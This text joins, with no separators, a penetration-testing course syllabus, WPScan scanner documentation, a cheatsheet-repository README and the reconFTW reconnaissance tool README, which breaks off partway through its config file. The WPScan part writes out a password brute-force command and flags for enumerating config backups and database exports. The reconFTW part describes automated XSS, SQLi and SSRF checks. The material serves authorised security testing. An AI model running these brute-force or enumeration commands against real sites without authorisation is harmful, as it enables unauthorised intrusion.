TCM Discord at https://discord.gg/REfpPJB. # Lesson Plan ## Week 1 Lessons: **Setting Up A Penetration Testing Environment** - This will focus on setting up a lab environment, specifically VMWare, Kali Linux, and our lab VMs. The lesson will briefly introduce important aspects of each set up (e.g. Snapshots in VMWare, the Kali Linux toolset, etc.) with the intention to build upon those aspects in later lessons. **How to Keep Notes Effectively** - This lesson will cover the importance of note taking from a pentester standpoint. The lesson will introduce the Kali Linux built-in note-taking application, KeepNote, and discuss how to take notes effectively. Taking notes during a penetration test is incredibly important as it allows a pentester reference points when writing their final report, discussing timelines with their team or manager, or even discussing specifics of a pentest with a client. **Introductory Linux** - This lesson will briefly cover the important Linux terminal commands needed to use Kali Linux. Some of the topics that will be covered are: navigating the file system, users and privileges, common network commands, bash scripting, and much more. ## Week 2 & 3 Lessons: **Introductory Python** - Similar to Linux, we will spend some time learning basic Python scripting, which will be essential to our future endeavors as penetration testers. ## Week 4 Lessons: **Hacking in Five Steps** - This lesson will introduce the five key components of hacking: reconnaissance, enumeration, exploitation, maintaining access, and covering tracks. These five key concepts will be built upon as we progress, with at least one part dedicated to each component. **The Art of Reconnaissance** - This lesson will discuss reconnaissance in depth and cover common tools used in the process. Some of the tools that will be covered are the OSINT Framework, SET, theHarvester, Bluto, Google Dorks, and Shodan. More tools will likely be added as the lesson is written. ## Week 5 Lesson: **Scanning Tactics** - This lesson will cover common tools in-depth that are used for port scanning including Nmap, Nessus, and Metasploit. The section will introduce readers to using a wide toolset for scanning on penetration tests and provide a deeper understanding of what is going on behind the scenes. For example, the importance of TCP vs UDP scanning, the three-way TCP handshake, stealth scanning, and various Nmap switches. It will also provide the first introduction to Metasploit and its usage, which will be built upon throughout the course. ## Week 6 Lesson: ***Enumeration for the win*** - The intent of this lesson is to provide an overview of basic enumeration tactics and then dive deep into specific tools used for common ports found in penetration testing. For example, if we find port 80 open on a scan (HTTP), we will likely want to know what service is running and enumerate that service for potential exploits at a high level. At a deep level, we will want to explore the app with tools such as Nikto, Dirbuster/Dirb, and Burp Suite to really enumerate the app where tools like Nmap and Nessus fail to go deep enough. ## Week 7 Lesson: **Gaining a Shell with Metasploit** - This lesson will cover how to use Metasploit to gain shell access to a vulnerable machine. This builds upon the introductory Metasploit from section 8 as we move from the auxiliary/scanning portion of Metasploit to the exploit portion. This lesson is important as Metasploit is a common tool in nearly every penetration testers toolkit, especially at the beginner level. **Compiling Exploits** - This lesson will add to exploitation learned in section 9, except that the exploitation is now done manually, without Metasploit. This will teach the reader how to safely download exploits from the web, generate shellcode, compile the exploit if necessary, and execute it against a vulnerable machine. **When Nothing Else Works** - The previous two lessons in focus on having an exploit readily available that will provide shell access. As a penetration tester, gaining shell from an exploit does not happen most of the time. Sometimes, we have to get creative. This may include using social engineering and password spraying Outlook/other web applications. The section also focuses on the failing mentality and how it is okay to not break in on every external. Lastly, it will cover some common non-critical findings/things to look for that can be added to a report, such as default web pages, public RDP, public SNMP, etc. ## Week 8, 9, and 10 (Internal Pentesting): **Hello Enumeration, My Old Friend** - This lesson will cover post-exploitation enumeration. In other words, we’ve gained access to a single machine in a network, now what are we looking for? The chapter will focus heavily on Active Directory enumeration concepts as that is the likely environment a pentester will encounter in the real world. However, lessons will be provided for non-Active Directory environments as well. Important tools that will be discussed are nbtscan, nslookup, nbtstat, net commands, and more. **Active Directory Exploitation** - This lesson focuses on the recognition of vulnerabilities and exploitation tactics in an internal Active Directory environment. Attacks that will be introduced include: LLMNR poisoning/hash cracking, SMB hash relaying, pass the hash, token impersonation, kerberoasting, GPP/c-password attacks, and PowerShell attacks. More attacks will likely be added as the lesson is written, but the most common have been provided. **Exploiting Non-Active Directory Environments** - This lesson will discuss the exploitation of devices in a non-Active Directory environment. Students will learn how to identify critical servers, conduct local password attacks, and learn outside-the-box strategies for attacking. Examples will come from previous penetration tests, such as exploiting default credentials on local printers and dumping stored credentials to gain access to critical servers. ## Week 11 Lessons: **Maintaining Access / Pivoting / Cleanup** - This lesson will discuss methods of maintaining access on a network, pivoting into other networks, and how to properly clean up as you exit a network. **The Legal Side of the House** - This lesson will cover the important legal aspects that a pentester must know prior to conducting a penetration test. For example, having a rules of engagement document that specifies which networks can be attacked and what attack methods can be used. Knowing the common legal documents that a junior pentester may encounter will give him or her an advantage in their early careers. **Report Writing** - This lesson will cover the importance of report writing in penetration testing and walk through what should be included in a penetration test report. A demo penetration test report will be provided that will cover many of the findings that we have discussed in prior chapters. This will provide students with a clear understanding of what is expected on a penetration test report and how to write on effectively.
--- title: 'WPScan' path: 'scanners/wpscan' category: 'scanner' type: "CMS" state: "released" appVersion: "3.8.5" usecase: 'Wordpress Vulnerability Scanner' --- ![WPScan Logo](https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png) WPScan is a free, for non-commercial use, black box WordPress vulnerability scanner written for security professionals and blog maintainers to test the security of their sites. > NOTE: You need to provide WPSan with an API Token so that it can look up vulnerabilities infos with [https://wpvulndb.com](https://wpvulndb.com). Without the token WPScan will only identify WordPress Core / Plugin / Theme versions but not if they are actually vulnerable. You can get a free API Token at by registering for an account at [https://wpvulndb.com](https://wpvulndb.com). Using the secureCodeBox WPScans you can specify the token via the `WPVULNDB_API_TOKEN` target attribute, see the example below. To learn more about the WPScan scanner itself visit [wpscan.org] or [wpscan.io]. <!-- end --> ## Deployment The WPScan scanType can be deployed via helm: ```bash helm upgrade --install wpscan secureCodeBox/wpscan ``` ## Scanner Configuration The following security scan configuration example are based on the [WPScan Documentation], please take a look at the original documentation for more configuration examples. * Scan all plugins with known vulnerabilities: `wpscan --url example.com -e vp --plugins-detection mixed --api-token WPVULNDB_API_TOKEN` * Scan all plugins in our database (could take a very long time): `wpscan --url example.com -e ap --plugins-detection mixed --api-token WPVULNDB_API_TOKEN` * Password brute force attack: `wpscan --url example.com -e u --passwords /path/to/password_file.txt` * WPScan keeps a local database of metadata that is used to output useful information, such as the latest version of a plugin. The local database can be updated with the following command: `wpscan --update` * When enumerating the WordPress version, installed plugins or installed themes, you can use three different "modes", which are: * passive * aggressive * mixed If you want the most results use the "mixed" mode. However, if you are worried that the server may not be able to handle many requests, use the "passive" mode. The default mode is "mixed", except plugin enumeration, which is "passive". You will need to manually override the plugin detection mode, if you want to use anything other than the default, with the `--plugins-detection` option. * WPScan can enumerate various things from a remote WordPress application, such as plugins, themes, usernames, backed up files wp-config.php files, Timthumb files, database exports and more. To use WPScan's enumeration capabilities supply the `-e `option. ```bash Available Choices: vp | Vulnerable plugins ap | All plugins p | Plugins vt | Vulnerable themes at | All themes t | Themes tt | Timthumbs cb | Config backups dbe | Db exports u | User IDs range. e.g: u1-5 Range separator to use: '-' Value if no argument supplied: 1-10 m | Media IDs range. e.g m1-15 Note: Permalink setting must be set to "Plain" for those to be detected Range separator to use: '-' Value if no argument supplied: 1-100 Separator to use between the values: ',' Default: All Plugins, Config Backups Value if no argument supplied: vp,vt,tt,cb,dbe,u,m Incompatible choices (only one of each group/s can be used): - vp, ap, p - vt, at, t ``` ## Chart Configuration | Key | Type | Default | Description | |-----|------|---------|-------------| | image.repository | string | `"wpscanteam/wpscan"` | Container Image to run the scan | | image.tag | string | `nil` | defaults to the charts appVersion | | parseJob.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the parser will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ | | parserImage.repository | string | `"docker.io/securecodebox/parser-wpscan"` | Parser image repository | | parserImage.tag | string | defaults to the charts version | Parser image tag | | scannerJob.backoffLimit | int | 3 | There are situations where you want to fail a scan Job after some amount of retries due to a logical error in configuration etc. To do so, set backoffLimit to specify the number of retries before considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#pod-backoff-failure-policy) | | scannerJob.env | list | `[]` | Optional environment variables mapped into each scanJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) | | scannerJob.extraContainers | list | `[]` | Optional additional Containers started with each scanJob (see: https://kubernetes.io/docs/concepts/workloads/pods/init-containers/) | | scannerJob.extraVolumeMounts | list | `[]` | Optional VolumeMounts mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) | | scannerJob.extraVolumes | list | `[]` | Optional Volumes mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) | | scannerJob.resources | object | `{}` | CPU/memory resource requests/limits (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/, https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/) | | scannerJob.securityContext | object | `{}` | Optional securityContext set on scanner container (see: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) | | scannerJob.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the scanner will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ | [wpscan.io]: https://wpscan.io/ [wpscan.org]: https://wpscan.org/ [WPScan Documentation]: https://github.com/wpscanteam/wpscan/wiki/WPScan-User-Documentation
# Cheatsheet Repository Glad you made it to our little corner of the interwebs. We know that being a programmer can be tough. It's a constantly-changing landscape, and it can be hard to keep up. That's why we've put together this cheatsheet repository, so you can get all the info you need in one place. ## Our Cheatsheets We have a growing collection of cheatsheets covering popular programming languages and tools. Each cheatsheet includes all the essential information you need to get started, with links to official documentation for further reading. ## Table of Contents **Note:** The below table of contents link to the cheatsheets.lyuda.io git wiki. Since the README is also the homepage of the git wiki, it makes it easier for users to navigate from the site. - **Programming Languages** - [AWK](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/awk.md) - [C](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/c.md) - [C++](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/cpp.md) - [C#](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/csharp.md) - [CoffeeScript](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/coffeescript.md) - [Crystal](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/crystal.md) - [D](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/d.md) - [Fortran](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/fortran.md) - [Go](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/go.md) - [Groovy](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/groovy.md) - [Java](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/java.md) - [JavaScript](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/javascript.md) - [Julia](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/julia.md) - [Kotlin](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/kotlin.md) - [Lisp](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/lisp.md) - [Perl](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/perl.md) - [PHP](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/php.md) - [Python](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/python.md) - [R](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/r.md) - [Ruby](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/ruby.md) - [Rust](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/rust.md) - [Scala](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/scala.md) - **Shell** - [Bash](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/shell/bash.md) - [Powershell](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/shell/powershell.md) - [TypeScript](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/typescript.md) - [V](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/v.md) - **Web Technologies** - [JSON](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/web_technologies/json.md) - [SVG](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/web_technologies/svg.md) - [XML](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/web_technologies/xml.md) - [YAML](https://github.com/lyudaio/cheatsheets/blob/main/programming_languages/yaml.md) - **Operating Systems** - **Linux** - [Arch Linux](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/linux/arch.md) - [CentOS](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/linux/centos.md) - [Debian](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/linux/debian.md) - [Fedora](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/linux/fedora.md) - [Kali](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/linux/kali.md) - [RHEL](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/linux/rhel.md) - [OpenSUSE](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/linux/opensuse.md) - [Ubuntu](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/linux/ubuntu.md) - **Tools** - [df](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/linux/tools/df.md) - [git](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/linux/tools/git.md) - [grep](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/linux/tools/grep.md) - [ls](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/linux/tools/ls.md) - [rsync](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/linux/tools/rsync.md) - [ssh](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/linux/tools/ssh.md) - [tar](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/linux/tools/tar.md) - [vim](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/linux/tools/vim.md) - **Versions** - [Linux Distributions Versions](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/linux/versions.md) - **macOS** - **Versions** - [macOS Versions](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/macos/versions.md) - **Windows** - [Windows 95](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/windows/windows_95.md) - [Windows Server](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/windows/windows_server.md) - **Versions** - [Windows Versions](https://github.com/lyudaio/cheatsheets/blob/main/operating_systems/windows/versions.md) - **Security** - [Security Resources](https://github.com/lyudaio/cheatsheets/blob/main/security/security_resources) - **Tools** - [Aircrack-ng](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/aircrack-ng.md) - [BeEF](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/beef.md) - [Burp Suite](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/burpsuite.md) - [Ettercap](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/ettercap.md) - [Hashcat](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/hashcat.md) - [Hydra](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/hydra.md) - [John the Ripper](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/johntheripper.md) - [Maltego](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/maltego.md) - [Metasploit](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/metasploit.md) - [Nikto](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/nikto.md) - [Nmap](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/nmap.md) - [OpenSSL](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/openssl.md) - [OpenVAS](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/openvas.md) - [Reaver](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/reaver.md) - [SET](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/set.md) - [sqlmap](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/sqlmap.md) - [Wireshark](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/wireshark.md) - [zap](https://github.com/lyudaio/cheatsheets/blob/main/security/tools/zap.md) - **Databases** - [Cassandra](https://github.com/lyudaio/cheatsheets/blob/main/databases/cassandra.md) - [DynamoDB](https://github.com/lyudaio/cheatsheets/blob/main/databases/dynamodb.md) - [Elasticsearch](https://github.com/lyudaio/cheatsheets/blob/main/databases/elasticsearch.md) - [FirebirdSQL](https://github.com/lyudaio/cheatsheets/blob/main/databases/firebirdsql.md) - [IBM DB2](https://github.com/lyudaio/cheatsheets/blob/main/databases/ibmdb.md2) - [InfluxDB DB2](https://github.com/lyudaio/cheatsheets/blob/main/databases/influxdb.md) - [MariaDB](https://github.com/lyudaio/cheatsheets/blob/main/databases/mariadb.md) - [MongoDB](https://github.com/lyudaio/cheatsheets/blob/main/databases/mongodb.md) - [MySQL](https://github.com/lyudaio/cheatsheets/blob/main/databases/mysql.md) - [Neo4j](https://github.com/lyudaio/cheatsheets/blob/main/databases/neo4j.md) - [Oracle](https://github.com/lyudaio/cheatsheets/blob/main/databases/oracle.md) - [OrientDB](https://github.com/lyudaio/cheatsheets/blob/main/databases/orientdb.md) - [PostgreSQL](https://github.com/lyudaio/cheatsheets/blob/main/databases/postgres.md) - [Redis](https://github.com/lyudaio/cheatsheets/blob/main/databases/redis.md) - [Snowflake](https://github.com/lyudaio/cheatsheets/blob/main/databases/snowflake.md) - [Solr](https://github.com/lyudaio/cheatsheets/blob/main/databases/solr.md) - [SQLite](https://github.com/lyudaio/cheatsheets/blob/main/databases/sqlite.md) - [SQL Server](https://github.com/lyudaio/cheatsheets/blob/main/databases/sqlserver.md) - **Meta** - [Defense in Depth](https://github.com/lyudaio/cheatsheets/blob/main/meta/defense.md) - [DevOps/SRE vs SysAdmins](https://github.com/lyudaio/cheatsheets/blob/main/meta/devops_vs_sysadmin.md) - [Don't Repeat Yourself (DRY)](https://github.com/lyudaio/cheatsheets/blob/main/meta/dry.md) - [ID10T](https://github.com/lyudaio/cheatsheets/blob/main/meta/id10t.md) - [KISS](https://github.com/lyudaio/cheatsheets/blob/main/meta/kiss.md) - [PEBCAK](https://github.com/lyudaio/cheatsheets/blob/main/meta/pebcak.md) - [RTFM](https://github.com/lyudaio/cheatsheets/blob/main/meta/rtfm.md) - [Rubber Duck Debugging](https://github.com/lyudaio/cheatsheets/blob/main/meta/rubberduckdebug.md) - [Site Reliability Engineering](https://github.com/lyudaio/cheatsheets/blob/main/meta/sre.md) - [YAGNI](https://github.com/lyudaio/cheatsheets/blob/main/meta/yagni.md) - **Infrastructure** - [Ansible](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/ansible.md) - [Chef](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/chef.md) - [Cloud-init](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/cloud-init.md) - [CloudFormation](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/cloudformation.md) - **Kubernetes** - [ALB](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/kubernetes/alb.md) - [Helm](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/kubernetes/helm.md) - [kubectl](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/kubernetes/kubectl.md) - [Kustomize](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/kubernetes/kustomize.md) - **Monitoring** - [Alertmanager](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/monitoring/alertmanager.md) - [Grafana](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/monitoring/grafana.md) - [Loki](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/monitoring/loki.md) - [Prometheus](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/monitoring/prometheus.md) - [Promtail](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/monitoring/promtail.md) - **Networking** - [API](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/networking/api.md) - [Firewall](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/networking/firewall.md) - **OSI** - [Application Layer](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/networking/osi/application.md) - [Data Link Layer](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/networking/osi/datalink.md) - [Network Layer](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/networking/osi/network.md) - [OSI Model](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/networking/osi/osi.md) - [Physical Layer](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/networking/osi/physical.md) - [Presentation Layer](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/networking/osi/presentation.md) - [Transport Layer](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/networking/osi/transport.md) - [Puppet](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/puppet.md) - [Terraform](https://github.com/lyudaio/cheatsheets/blob/main/infrastructure/terraform.md) ## Contributing I welcome contributions to this cheatsheet collection! My goal is to provide up-to-date and general information about various topics in a concise and simple manner. When contributing, please keep the following guidelines in mind: - Try to keep the cheatsheets up to date, including the latest versions of software and technologies. - Keep the information as general as possible, avoiding specific configurations or custom setups. - Emphasize the essential information and convey it concisely. - Use clear and concise language, avoiding overly technical terms or jargon. If you would like to contribute, please fork the repository, make your changes, and open a pull request. I appreciate your help in making this resource as helpful as possible! ## About At our cheatsheet repository, we use AI to augment our engineering productivity and enable us to produce high-quality and useful cheatsheets quickly. This revolution in the forces of production has allowed us to make a vast array of information available to engineers of all levels, distributed for free across the internet. It's important to note that AI is not a magic bullet that will instantly produce high-quality output without any human intervention. Instead, engineers should view AI as a tool to be used alongside their existing knowledge and expertise. The best results are achieved when engineers fact-check the output of the AI, edit it to be more personable and human-like, and maintain the same code review standards as they would for human-created content. We recognize that there are both right and wrong ways to use AI in engineering. Using AI as a standalone tool without human oversight can lead to incorrect or even harmful results. However, by using AI as a tool and combining it with human oversight, we can enhance our productivity and make more information available to the wider engineering community. In addition to using AI responsibly, we believe that the open-source community can play a key role in increasing the quality of AI-augmented cheatsheets. By combining the knowledge and expertise of engineers across the globe, we can collaborate to create more comprehensive and accurate content. We encourage our users to contribute to our cheatsheets, providing feedback, suggestions, and corrections. By doing so, we can work together to improve the quality of our content and ensure that it remains relevant and up-to-date. Furthermore, we believe that the open-source community can play a significant role in developing and improving AI models that are used to generate content. By making AI models open source and encouraging contributions from the community, we can ensure that they are thoroughly tested and vetted, leading to better results and reducing the potential for harm. In summary, we believe that by combining the power of AI with the expertise of the open-source community, we can create high-quality cheatsheets that are accurate, up-to-date, and accessible to all. We encourage our users to get involved and contribute to our cheatsheets, ensuring that they remain a valuable resource for engineers around the world. Thank you for visiting our cheatsheet website, and we hope that our content is useful to you in your engineering endeavors. - lyuda io ## License This repository is licensed under the MIT License. The MIT License is a permissive license that is short and to the point. It lets people do almost anything they want with your code as long as they provide attribution back to you and don’t hold you liable. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
<h1 align="center"> <br> <a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a> <br> reconFTW <br> </h1> <p align="center"> <a href="https://github.com/six2dez/reconftw/releases/tag/v2.3"> <img src="https://img.shields.io/badge/release-v2.3-green"> </a> </a> <a href="https://www.gnu.org/licenses/gpl-3.0.en.html"> <img src="https://img.shields.io/badge/license-GPL3-_red.svg"> </a> <a href="https://twitter.com/Six2dez1"> <img src="https://img.shields.io/badge/twitter-%40Six2dez1-blue"> </a> <a href="https://github.com/six2dez/reconftw/issues?q=is%3Aissue+is%3Aclosed"> <img src="https://img.shields.io/github/issues-closed-raw/six2dez/reconftw.svg"> </a> <a href="https://github.com/six2dez/reconftw/wiki"> <img src="https://img.shields.io/badge/doc-wiki-blue.svg"> </a> <a href="https://t.me/joinchat/H5bAaw3YbzzmI5co"> <img src="https://img.shields.io/badge/[email protected]"> </a> <a href="https://hub.docker.com/r/six2dez/reconftw"> <img alt="Docker Cloud Build Status" src="https://img.shields.io/docker/cloud/build/six2dez/reconftw"> </a> </p> <h3 align="center">Summary</h3> **ReconFTW** automates the entire process of reconnaisance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target. ReconFTW uses lot of techniques (passive, bruteforce, permutations, certificate transparency, source code scraping, analytics, DNS records...) for subdomain enumeration which helps you getting the maximum and the most interesting subdomains so that you be ahead of the competition. It also performs various vulnerability checks like XSS, Open Redirects, SSRF, CRLF, LFI, SQLi, SSL tests, SSTI, DNS zone transfers, and much more. Along with these, it performs OSINT techniques, directory fuzzing, dorking, ports scanning, screenshots, nuclei scan on your target. So, what are you waiting for Go! Go! Go! :boom: 📔 Table of Contents ----------------- - [💿 Installation:](#-installation) - [a) In your PC/VPS/VM](#a-in-your-pcvpsvm) - [b) Docker Image 🐳 (3 options)](#b-docker-image--3-options) - [c) Terraform + Ansible](#c-terraform--ansible) - [⚙️ Config file:](#️-config-file) - [Usage:](#usage) - [Example Usage:](#example-usage) - [Axiom Support: :cloud:](#axiom-support-cloud) - [BBRF Support: :computer:](#bbrf-support-computer) - [Sample video:](#sample-video) - [:fire: Features :fire:](#fire-features-fire) - [Osint](#osint) - [Subdomains](#subdomains) - [Hosts](#hosts) - [Webs](#webs) - [Extras](#extras) - [Mindmap/Workflow](#mindmapworkflow) - [Data Keep](#data-keep) - [Main commands:](#main-commands) - [How to contribute:](#how-to-contribute) - [Need help? :information_source:](#need-help-information_source) - [Support this project](#support-this-project) - [Buymeacoffee](#buymeacoffee) - [DigitalOcean referral link](#digitalocean-referral-link) - [GitHub sponsorship](#github-sponsorship) - [Sponsors ❤️](#sponsors-️) - [Thanks :pray:](#thanks-pray) - [Disclaimer](#disclaimer) --- # 💿 Installation: ## a) In your PC/VPS/VM > You can check out our wiki for the installation guide [Installation Guide](https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide) :book: - Requires [Golang](https://golang.org/dl/) > **1.15.0+** installed and paths correctly set (**$GOPATH**, **$GOROOT**) ```bash git clone https://github.com/six2dez/reconftw cd reconftw/ ./install.sh ./reconftw.sh -d target.com -r ``` ## b) Docker Image 🐳 (3 options) - Pull the image ```bash $ docker pull six2dez/reconftw:main ``` - Run the container ``` $ docker run -it --rm \ -v "${PWD}/OutputFolder/":'/reconftw/Recon/' \ six2dez/reconftw:main -d example.com -r ``` However, if you wish to: 1. Dynamically modify the behaviour & function of the image 2. Build your own container 3. Build an Axiom Controller on top of the official image Please refer to the [Docker](https://github.com/six2dez/reconftw/wiki/4.-Docker) documentation. ## c) Terraform + Ansible Yes! reconFTW can also be easily deployed with Terraform and Ansible to AWS, if you want to know how to do it, you can check the guide [here](Terraform/README.md) # ⚙️ Config file: > A detailed explaintion of config file can be found here [Configuration file](https://github.com/six2dez/reconftw/wiki/3.-Configuration-file) :book: - Through ```reconftw.cfg``` file the whole execution of the tool can be controlled. - Hunters can set various scanning modes, execution preferences, tools, config files, APIs/TOKENS, personalized wordlists and much more. <details> <br><br> <summary> :point_right: Click here to view default config file :point_left: </summary> ```yaml ################################################################# # reconFTW config file # ################################################################# # General values tools=~/Tools SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" profile_shell=".$(basename $(echo $SHELL))rc" reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) generate_resolvers=false proxy_url="http://127.0.0.1:8080/" #dir_output=/custom/output/path # Golang Vars (Comment or change on your own) export GOROOT=/usr/local/go export GOPATH=$HOME/go export PATH=$GOPATH/bin:$GOROOT/bin:$HOME/.local/bin:$PATH # Tools config files #NOTIFY_CONFIG=~/.config/notify/provider-config.yaml # No need to define AMASS_CONFIG=~/.config/amass/config.ini GITHUB_TOKENS=${tools}/.github_tokens #CUSTOM_CONFIG=custom_config_path.txt # In case you use a custom config file, uncomment this line and set your files path # APIs/TOKENS - Uncomment the lines you want removing the '#' at the beginning of the line #SHODAN_API_KEY="XXXXXXXXXXXXX" #WHOISXML_API="XXXXXXXXXX" #XSS_SERVER="XXXXXXXXXXXXXXXXX" #COLLAB_SERVER="XXXXXXXXXXXXXXXXX" #slack_channel="XXXXXXXX" #slack_auth="xoXX-XXX-XXX-XXX" # File descriptors DEBUG_STD="&>/dev/null" DEBUG_ERROR="2>/dev/null" # Osint OSINT=true GOOGLE_DORKS=true GITHUB_DORKS=true METADATA=true EMAILS=true DOMAIN_INFO=true IP_INFO=true METAFINDER_LIMIT=20 # Max 250 # Subdomains SUBDOMAINS_GENERAL=true SUBPASSIVE=true SUBCRT=true SUBANALYTICS=true SUBBRUTE=true SUBSCRAPING=true SUBPERMUTE=true SUBTAKEOVER=true SUBRECURSIVE=true SUB_RECURSIVE_PASSIVE=false # Uses a lot of API keys queries SUB_RECURSIVE_BRUTE=false # Needs big disk space and time to resolve ZONETRANSFER=true S3BUCKETS=true REVERSE_IP=false 